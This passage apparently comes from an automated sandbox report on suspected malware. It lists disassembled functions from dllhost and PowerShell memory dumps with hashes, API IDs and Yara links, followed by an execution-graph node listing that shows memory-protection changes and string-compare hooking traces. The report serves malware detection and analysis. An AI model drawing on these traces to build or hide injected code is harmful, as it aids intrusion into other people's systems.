                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction ID: 8d1b97a6db587e6cd0085fb6087efec68800c6eb61256cc6ca6d325f210735d5
                                                        • Opcode Fuzzy Hash: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction Fuzzy Hash: 67112536218B80C2EF218F25E444259B7A8F788B94F189264EFDD07B69DF39C991CB01
                                                        Function 000002E86A09D77C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                        • String ID: InitializeCriticalSectionEx
                                                        • API String ID: 539475747-3084827643
                                                        • Opcode ID: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction ID: a6350c572821dcefd0f78d61a1d7d40c9c3789682fd0a3a7d799ec9b8cebc9e0
                                                        • Opcode Fuzzy Hash: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction Fuzzy Hash: F4F0A729394BC0D2EF049B61F488699A378FB48B90F4451A5EBDE13B96DF38C4C5C702
                                                        Function 000002E86A09D728 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • try_get_function.LIBVCRUNTIME ref: 000002E86A09D751
                                                        • TlsSetValue.KERNEL32(?,?,?,000002E86A09B50E,?,?,?,000002E86A09B969,?,?,?,?,000002E86A09BA1D), ref: 000002E86A09D768
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Valuetry_get_function
                                                        • String ID: FlsSetValue
                                                        • API String ID: 738293619-3750699315
                                                        • Opcode ID: fc325339b7f97732f837055afb4aa1383e496b4c3619d26f7748048e5b1acc4f
                                                        • Instruction ID: d475132d9dafe9252ab9c71c65127688c8c5a07ae8dce2aea3215af333d4acb3
                                                        • Opcode Fuzzy Hash: fc325339b7f97732f837055afb4aa1383e496b4c3619d26f7748048e5b1acc4f
                                                        • Instruction Fuzzy Hash: 26E09B652805C0E1EE444B60F4482D8A269B748780F589065E69D073D6DF38C4C5C313
                                                        Function 00000001400020B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: ntdll.dll
                                                        • API String ID: 1646373207-2227199552
                                                        • Opcode ID: 4640d05c2373d3640ae9100a2b8d7c29625f92196451c223be7d6a549915ad55
                                                        • Instruction ID: 6962b19410fb25e2496a1e9abeaa8d0c6436d1fe4488b115c491d50ca37cf121
                                                        • Opcode Fuzzy Hash: 4640d05c2373d3640ae9100a2b8d7c29625f92196451c223be7d6a549915ad55
                                                        • Instruction Fuzzy Hash: 04D0C9F8B1260182EF1AE76378553E052515B6CBC9F4984209F0A47372DA38C4E48318
                                                        Function 000002E86A091C28 Relevance: 5.0, APIs: 4, Instructions: 48memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                        • Instruction ID: 4f68d4ad0bd3e890886d2d80f8af3a8323ef2f1cdbd5ca15bfb33dbdf11ab205
                                                        • Opcode Fuzzy Hash: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                        • Instruction Fuzzy Hash: 6A11A022B44BD0C1EE158B66E408199E7A8FBC8FA0F594264DF9D537A4EE38C082C301
                                                        Function 000002E86A091268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction ID: 3b9186d13b4405abaa6682b60103fde372ebc3aedc53a7f58e461d487e2e3eb6
                                                        • Opcode Fuzzy Hash: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction Fuzzy Hash: CDE03235A41A80C6EF088BA2D80C349B7E5EB8CB09F0880248A8907361DF7D84D98B82
                                                        Function 0000000140001220 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                                        • Instruction ID: 1511527892a3fb8eded8389ff9e17f75ca8e9e74a60c21ae91e61c536c9c2234
                                                        • Opcode Fuzzy Hash: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                                        • Instruction Fuzzy Hash: 39E039F170160086E705DB63E80438936E1EB8CB81F858024DA1907371DF7D84D98750
                                                        Function 000002E86A091000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction ID: d4f02781868ac6ceed087ba3c348f65b03fc939797e1a8fb7640c434253b21e7
                                                        • Opcode Fuzzy Hash: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction Fuzzy Hash: 36E0E575651A80C6EF089B62D80C259B7A5FB8CB15F488064CA4907321EE3884D98B12
                                                        Function 0000000140001000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                        • Instruction ID: 4369636dfc19c6b46be3dddb2077bf5e2e0bd1da0e3c66b1f75a47794e7da392
                                                        • Opcode Fuzzy Hash: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                        • Instruction Fuzzy Hash: 78E0E5F1751A0086E70ADB63E80439976E1FB8CB91F898024EA1907731EE3884D98A24

                                                        Executed Functions

                                                        Function 00007FFD9B8A6605 Relevance: .4, Instructions: 447COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1870908153.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c201d4cfd947c2aab7d0f8068b6b05513b61ead7412ea2c731e6a76e8444ff3d
                                                        • Instruction ID: 22124d3102b84e47b5df20c261a9c811147bd372cfe714fff87cbbbdca53167f
                                                        • Opcode Fuzzy Hash: c201d4cfd947c2aab7d0f8068b6b05513b61ead7412ea2c731e6a76e8444ff3d
                                                        • Instruction Fuzzy Hash: 2ED15BA2A1FACE4FEB65DB6848645B5BBA0EF1A310B0901FED45DC70EBD914AC05C361
                                                        Function 00007FFD9B7DA3AC Relevance: .2, Instructions: 222COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1869742700.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 310f0f653dc7326ec8a24a186150ae98c1d9db7c3c148008fcedfe2b2858142a
                                                        • Instruction ID: 2b44eac253f6175dcb619a6cd3f78a1ba7da80aaa08a9f80c1ef281649782b7b
                                                        • Opcode Fuzzy Hash: 310f0f653dc7326ec8a24a186150ae98c1d9db7c3c148008fcedfe2b2858142a
                                                        • Instruction Fuzzy Hash: A461FB3190CB4C4FDB59DB6C9C4A6E97FF0EB96321F04426FD049C3162CA74685ACB92
                                                        Function 00007FFD9B7D9738 Relevance: .2, Instructions: 154COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1869742700.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3cf533e3002681fd93f6d7b3b4bafe6ced6ad50ef3c09c115aed29b36cce6019
                                                        • Instruction ID: 7d15fb9dc37f07538d8a7f58cdd7a1e9d3d4ffb063fea4effa2528728e4bd29d
                                                        • Opcode Fuzzy Hash: 3cf533e3002681fd93f6d7b3b4bafe6ced6ad50ef3c09c115aed29b36cce6019
                                                        • Instruction Fuzzy Hash: 69415F71A0DB884FDB189F5C580A6B87BE0FF95710F40426FE098D7192DB24B915C7C2
                                                        Function 00007FFD9B6BEC60 Relevance: .1, Instructions: 123COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1868088648.00007FFD9B6BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6BD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b6bd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 23505bc844504d0df81e75ce72b0316260e35760c988ad5ee5e0424bc8d78aa5
                                                        • Instruction ID: e4c086680ebbaaa04f90794beb4d5d7dd1ca31ff9139a28afee5550b0167ea2c
                                                        • Opcode Fuzzy Hash: 23505bc844504d0df81e75ce72b0316260e35760c988ad5ee5e0424bc8d78aa5
                                                        • Instruction Fuzzy Hash: 2D41297050EBC44FE7568B3898519523FF0EF56320B1506EFD098CF1A7C625A846CBA2
                                                        Function 00007FFD9B7D33B5 Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1869742700.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
                                                        • Instruction ID: 7d18de3127f3f1dd01fd625624dbb9d3bcbd9e505403495affb5961ee0d50b6a
                                                        • Opcode Fuzzy Hash: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
                                                        • Instruction Fuzzy Hash: 4D01A73020CB0C4FD748EF0CE051AA5B3E0FB85360F10066DE58AC36A1DA32E882CB41
                                                        Function 00007FFD9B7DA0FB Relevance: .0, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1869742700.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 06fde61f72af5a0c16009eaecdfc218fa21df1d93e9270e15e243ae35ae8ef12
                                                        • Instruction ID: 1b596c0e12b13b7622aea8b57449bdbbe16ffb9b7016840186ba41f1e27fc817
                                                        • Opcode Fuzzy Hash: 06fde61f72af5a0c16009eaecdfc218fa21df1d93e9270e15e243ae35ae8ef12
                                                        • Instruction Fuzzy Hash: 34F0C23660AB8C4FDB52EF2C98654D57FA0FFA6641B0502ABD588CB072EB2159488781
                                                        Function 00007FFD9B8A414D Relevance: .0, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1870908153.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0f12c3ca706bd90e4a6bd2c24f54174b913bdbb8b78bd1cfd2fb4760190f2314
                                                        • Instruction ID: 6626564ffef26f6823caca17d84527698f06c1c6a2ad1066fa11a5a4e5877c1f
                                                        • Opcode Fuzzy Hash: 0f12c3ca706bd90e4a6bd2c24f54174b913bdbb8b78bd1cfd2fb4760190f2314
                                                        • Instruction Fuzzy Hash: C5F0BE32B0E5498FDB68EB8CE4518E877E0EF5932071600BAE06DC71B3CA25EC41C750
                                                        Function 00007FFD9B8A4400 Relevance: .0, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1870908153.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d48fd6a8806828cbf3084cea4ee9bafb79648d2541a87ea29e08a120dfc52e4b
                                                        • Instruction ID: d7d497ad5aafac53dbe409b1455c4dfd3f0c742d31521fdd0edb2363bf1b3ce9
                                                        • Opcode Fuzzy Hash: d48fd6a8806828cbf3084cea4ee9bafb79648d2541a87ea29e08a120dfc52e4b
                                                        • Instruction Fuzzy Hash: A0F05E32A0F5498FDB64EB5CE4618A877E0FF4932475600BAE15DCB4A3DA29BC41C750
                                                        Function 00007FFD9B8A41D1 Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1870908153.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                        • Instruction ID: 09323d83657ad24737761ed45f903d87c673e9f131c1b1bb4a609df375895b1c
                                                        • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                        • Instruction Fuzzy Hash: D7E01A31B0C8088FDA78DB4CE0519A977E1EBA832171601BBD14EC7571CA22ED518B90

                                                        Non-executed Functions

                                                        Function 00007FFD9B7D85FA Relevance: 6.4, Strings: 5, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1869742700.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: N_^$N_^$N_^$N_^$N_^
                                                        • API String ID: 0-1162251571
                                                        • Opcode ID: 8a58f7885fb3b7c48049ca84b228dd4b4dcbe855e120cc9a8ee1319338b6147b
                                                        • Instruction ID: 1ca6a916f09f9e7b84205c8306d708178fc27b6040ebbf63c805d2f5750f976c
                                                        • Opcode Fuzzy Hash: 8a58f7885fb3b7c48049ca84b228dd4b4dcbe855e120cc9a8ee1319338b6147b
                                                        • Instruction Fuzzy Hash: E441D6A2E4F7D64FD3228BA958690907FD0EF6226474E01FFC1998B173E9181A478706
                                                        Function 00007FFD9B7D8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1869742700.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: N_^4$N_^7$N_^F$N_^J
                                                        • API String ID: 0-3508309026
                                                        • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                        • Instruction ID: 33318d810732aedc5b8d73b2cd603b97cdeee6fc6f3f35bf73613f10f45d9dd5
                                                        • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                        • Instruction Fuzzy Hash: 3821497BB080654ED305BBBCBC289DD3750DFD423935642F2D2A9CB183EC14708A86C1

                                                        Execution Graph

                                                        Execution Coverage:3%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:1117
                                                        Total number of Limit Nodes:14
                                                        execution_graph 7670 225dc64e2e8 7671 225dc64e312 7670->7671 7672 225dc64b980 _invalid_parameter_noinfo 13 API calls 7671->7672 7673 225dc64e331 7672->7673 7674 225dc64b9f8 __free_lconv_mon 13 API calls 7673->7674 7675 225dc64e33f 7674->7675 7676 225dc64b980 _invalid_parameter_noinfo 13 API calls 7675->7676 7677 225dc64e369 7675->7677 7678 225dc64e35b 7676->7678 7679 225dc64d77c 6 API calls 7677->7679 7681 225dc64e372 7677->7681 7680 225dc64b9f8 __free_lconv_mon 13 API calls 7678->7680 7679->7677 7680->7677 7682 225dc6428e8 7684 225dc64292d 7682->7684 7683 225dc642990 7684->7683 7685 225dc643c70 StrCmpNIW 7684->7685 7685->7684 7096 225dc642a74 7098 225dc642ac8 7096->7098 7097 225dc642ae3 7098->7097 7100 225dc6433f8 7098->7100 7101 225dc643490 7100->7101 7103 225dc64341d 7100->7103 7101->7097 7102 225dc643c70 StrCmpNIW 7102->7103 7103->7101 7103->7102 7104 225dc641d08 StrCmpIW StrCmpW 7103->7104 7104->7103 7105 225dc64ae74 7106 225dc64ae7c 7105->7106 7108 225dc64aead 7106->7108 7110 225dc64aea9 7106->7110 7111 225dc64d77c 7106->7111 7116 225dc64aed8 7108->7116 7112 225dc64d3ec try_get_function 5 API calls 7111->7112 7113 225dc64d7b2 7112->7113 7114 225dc64d7bc 7113->7114 7115 225dc64d7c7 InitializeCriticalSectionAndSpinCount 7113->7115 7114->7106 7115->7114 7117 225dc64af03 7116->7117 7118 225dc64aee6 DeleteCriticalSection 7117->7118 7119 225dc64af07 7117->7119 7118->7117 7119->7110 6818 225dc64596d 6819 225dc645974 6818->6819 6820 225dc6459db 6819->6820 6821 225dc645a57 VirtualProtect 6819->6821 6822 225dc645a91 6821->6822 6823 225dc645a83 GetLastError 6821->6823 6823->6822 7120 225dc64e47c 7121 225dc64e4b2 7120->7121 7122 225dc64e4a4 7120->7122 7122->7121 7136 225dc64ad0c 7122->7136 7125 225dc64e4de 7144 225dc650e04 7125->7144 7126 225dc64e500 7126->7121 7147 225dc650db8 7126->7147 7130 225dc64e596 7132 225dc64d144 MultiByteToWideChar 7130->7132 7131 225dc64e544 7133 225dc64e579 7131->7133 7150 225dc64d144 7131->7150 7132->7133 7133->7121 7134 225dc64b960 _set_errno_from_matherr 13 API calls 7133->7134 7134->7121 7137 225dc64ad2b 7136->7137 7138 225dc64ad30 7136->7138 7137->7125 7137->7126 7138->7137 7153 225dc64b348 GetLastError 7138->7153 7271 225dc6514c4 7144->7271 7148 225dc64ad0c 33 API calls 7147->7148 7149 225dc64e540 7148->7149 7149->7130 7149->7131 7151 225dc64d14c MultiByteToWideChar 7150->7151 7154 225dc64b36f 7153->7154 7155 225dc64b36a 7153->7155 7156 225dc64d728 _invalid_parameter_noinfo 6 API calls 7154->7156 7159 225dc64b377 SetLastError 7154->7159 7157 225dc64d6e0 _invalid_parameter_noinfo 6 API calls 7155->7157 7158 225dc64b392 7156->7158 7157->7154 7158->7159 7161 225dc64b980 _invalid_parameter_noinfo 13 API calls 7158->7161 7163 225dc64b416 7159->7163 7164 225dc64ad4b 7159->7164 7162 225dc64b3a5 7161->7162 7165 225dc64b3c3 7162->7165 7166 225dc64b3b3 7162->7166 7211 225dc64acb4 7163->7211 7203 225dc64e604 7164->7203 7170 225dc64d728 _invalid_parameter_noinfo 6 API calls 7165->7170 7168 225dc64d728 _invalid_parameter_noinfo 6 API calls 7166->7168 7171 225dc64b3ba 7168->7171 7172 225dc64b3cb 7170->7172 7179 225dc64b9f8 __free_lconv_mon 13 API calls 7171->7179 7173 225dc64b3e1 7172->7173 7174 225dc64b3cf 7172->7174 7177 225dc64b0b4 _invalid_parameter_noinfo 13 API calls 7173->7177 7176 225dc64d728 _invalid_parameter_noinfo 6 API calls 7174->7176 7176->7171 7181 225dc64b3e9 7177->7181 7179->7159 7183 225dc64b9f8 __free_lconv_mon 13 API calls 7181->7183 7183->7159 7204 225dc64e619 7203->7204 7205 225dc64ad6e 7203->7205 7204->7205 7255 225dc64eaac 7204->7255 7207 225dc64e638 7205->7207 7208 225dc64e660 7207->7208 7209 225dc64e64d 7207->7209 7208->7137 7209->7208 7268 225dc64cdb8 7209->7268 7220 225dc64dd28 7211->7220 7246 225dc64dce0 7220->7246 7251 225dc64aebc EnterCriticalSection 7246->7251 7256 225dc64b348 33 API calls 7255->7256 7257 225dc64eabb 7256->7257 7258 225dc64eb06 7257->7258 7267 225dc64aebc EnterCriticalSection 7257->7267 7258->7205 7269 225dc64b348 33 API calls 7268->7269 7270 225dc64cdc1 7269->7270 7273 225dc651521 7271->7273 7276 225dc65152d 7271->7276 7272 225dc647d60 _handle_error 8 API calls 7275 225dc650e17 7272->7275 7273->7272 7274 225dc64b960 _set_errno_from_matherr 13 API calls 7274->7273 7275->7121 7276->7273 7276->7274 7686 225dc647efc 7693 225dc649470 7686->7693 7689 225dc647f09 7702 225dc649798 7693->7702 7696 225dc64abb4 7697 225dc64b4c4 _invalid_parameter_noinfo 13 API calls 7696->7697 7698 225dc647f12 7697->7698 